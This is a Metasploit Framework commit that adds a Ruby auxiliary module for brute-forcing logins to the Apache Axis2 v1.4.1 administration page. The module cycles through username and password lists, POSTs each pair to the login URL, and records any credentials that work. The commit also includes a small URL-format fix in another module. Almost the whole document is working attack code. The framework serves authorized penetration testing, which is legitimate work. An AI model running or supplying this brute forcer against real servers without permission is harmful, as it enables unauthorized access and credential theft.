Adding authentication brute forcer for Apache Axis2, submitted by Leandro Oliveira. Thanks!

git-svn-id: file:///home/svn/framework3/trunk@9467 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Tod Beardsley 2010-06-10 01:53:54 +00:00
parent ef372a9d78
commit 6e98191bdd
2 changed files with 91 additions and 1 deletions

View File

@ -0,0 +1,90 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Apache Axis2 v1.4.1 Brute Force Utility',
'Version' => '$Revision$',
'Description' => %q{This module attempts to login to an Apache Axis2 v1.4.1
instance using username and password combindations indicated by the USER_FILE,
PASS_FILE, and USERPASS_FILE options.},
'Author' => [
'==[ Alligator Security Team ]==',
'Leandro Oliveira <leandrofernando[at]gmail.com>'
],
'License' => MSF_LICENSE
)
register_options(
[ Opt::RPORT(8080),
OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
], self.class)
end
def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
end
def run_host(ip)
print_status "#{target_url} - Apache Axis - Attempting authentication"
each_user_pass { |user, pass|
do_login(user, pass)
}
end
def do_login(user=nil,pass=nil)
post_data = "userName=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&submit=+Login+"
vprint_status("#{target_url} - Apache Axis - Trying username:'#{user}' with password:'#{pass}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'data' => post_data,
}, 20)
if (res and res.code == 200 and res.body.to_s.match(/upload/) != nil)
print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info(
:host => rhost,
:user => user,
:pass => pass,
:target_host => rhost,
:target_port => rport,
:vhost => vhost,
:critical => true
)
elsif(res and res.code == 200)
vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'")
else
vprint_error("#{target_url} - Apache Axis - Unable to authenticate.")
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
end
def target_url
"http://#{vhost}#{datastore['URI']}:#{rport}"
"http://#{vhost}:#{rport}#{datastore['URI']}"
end